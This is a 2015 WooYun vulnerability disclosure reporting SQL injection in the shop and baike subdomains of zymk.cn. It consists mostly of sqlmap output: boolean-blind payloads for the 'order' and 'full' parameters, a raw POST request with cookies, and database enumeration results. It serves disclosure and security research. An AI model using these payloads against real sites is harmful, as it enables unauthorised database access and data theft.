当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150841

漏洞标题:漫客网SQL注入

相关厂商:zymk.cn

漏洞作者: 路人甲

提交时间:2015-11-02 15:15

修复时间:2015-11-07 15:16

公开时间:2015-11-07 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

漫客网SQL注入

详细说明:

http://shop.zymk.cn/index.php/Tag/?id=2&order=listorder


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: id=2&order=(SELECT (CASE WHEN (1825=1825) THEN 1825 ELSE 1825*(SELECT 1825 FROM INFORMA
TION_SCHEMA.CHARACTER_SETS) END))
---
[13:31:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:31:54] [INFO] fetching database names
[13:31:54] [INFO] fetching number of databases
[13:31:54] [INFO] resumed: 2
[13:31:54] [INFO] resumed: information_schema
[13:31:54] [INFO] resumed: mkshop
available databases [2]:
[*] information_schema
[*] mkshop


http://baike.zymk.cn/index.php?search-fulltext-title-1--all-0-within-time-desc-1


POST /index.php?search-default HTTP/1.1
Host: baike.zymk.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://baike.zymk.cn/index.php?doc-create.html
Cookie: BAIDU_DUP_lcr=http://www.baidu.com/link?url=Zjo417Xo1rTTvkH3nz19eSONwF-7YiqRO6ytC3XN6Ma&wd=&eqid=81757fa0000926ad00000005563444e9; Hm_lvt_bfeb001eb5a0b3162d945f1b9cdcb912=1446266096; Hm_lpvt_bfeb001eb5a0b3162d945f1b9cdcb912=1446269195; FX7m_3f67_saltkey=w4hcq4U3; FX7m_3f67_lastvisit=1446263008; FX7m_3f67_sid=y769HA; FX7m_3f67_lastact=1446268181%09misc.php%09seccode; FX7m_3f67_st_p=0%7C1446268175%7C4040132a2da2b28facae50f5f3ec46ac; FX7m_3f67_visitedfid=47D299D5472; FX7m_3f67_viewid=tid_596946; FX7m_3f67_seccode=6324.ec5df85813cf7859f6; TP_think_language=%22zh-CN%22; hd_sid=NkVt0X; hd_searchtime=1446267013; CNZZDATA1789733=cnzz_eid%3D1206615900-1446266704-%26ntime%3D1446266704; FX7m_3f67_home_readfeed=1446268160; FX7m_3f67_nofocus_home=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
searchtext=1&full=1


参数full

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: full (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: searchtext=1&full=1 AND 2105=2105
---
[13:35:35] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: PHP 5.2.17
back-end DBMS: Microsoft SQL Server 2008
[13:35:35] [INFO] fetching database names
[13:35:35] [INFO] fetching number of databases
[13:35:35] [INFO] resumed: 4411
[13:35:35] [INFO] resuming partial value: #\x13\x12\x12\n\tEE%##\x13\x12\x12\n\n\n\nER\tIEE%###\x13\
x12\x12\n\n\tIF\tEE%%E%%%#\x13\x13\x12\x12\x12\x12\n\tIEEE%%#%%#####%%#%#####\x13\x13\x12\x13\x13\x1
3\x13\x12\x12\x12\x12\x12\n\x12\x12\x12\x13%##%EE%&\n\nIEE%##\x13\x13\x12\x13\x12\n\tIEE%##\x14\x13\
x12\x12\n\tIEE%%##\x13\x13\x12\x12\n\n\tIIEE%##\x13\x12\x12\n\tE%%####\x13\x12\n\tIIEEE%#\x13\x12\x1
2\n\tEEE%##\x12\x12\x13\x13%IIEEEEE%%IM%E%#%#\x13\x13\x12\x12\x12\n\n\tIIK\x13\x12\x12\x12###\x13\x1
3#\x13\x13\x13\x12\x12\x12\tJ\tJ\x13*\n\n\tIIEEEIIEE%#\x13\x12\x12\n\tIIIE%E%#c#\x13E%##\x13\x12\x12
\x12\n\n\tIE%%%%###\x13\x12\x12\x12\n\n\tIEE##\x13\x13\x13\x13\x12\x12\x12\n\tIEE%#%"\x13\x13\x12\n\
tR\tEE#
[13:35:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' fo
r faster data retrieval
[13:35:35] [INFO] retrieved:


漏洞证明:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: id=2&order=(SELECT (CASE WHEN (1825=1825) THEN 1825 ELSE 1825*(SELECT 1825 FROM INFORMA
TION_SCHEMA.CHARACTER_SETS) END))
---
[13:36:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:36:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all dat
abase management system databases' tables
[13:36:16] [INFO] fetching tables for database: 'mkshop'
[13:36:16] [INFO] fetching number of tables for database 'mkshop'
[13:36:16] [INFO] resumed: 189
[13:36:16] [INFO] resuming partial value: activi
[13:36:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' fo
r faster data retrieval
[13:36:16] [INFO] retrieved: ty_nu


跑的慢不深入

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-07 15:16

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无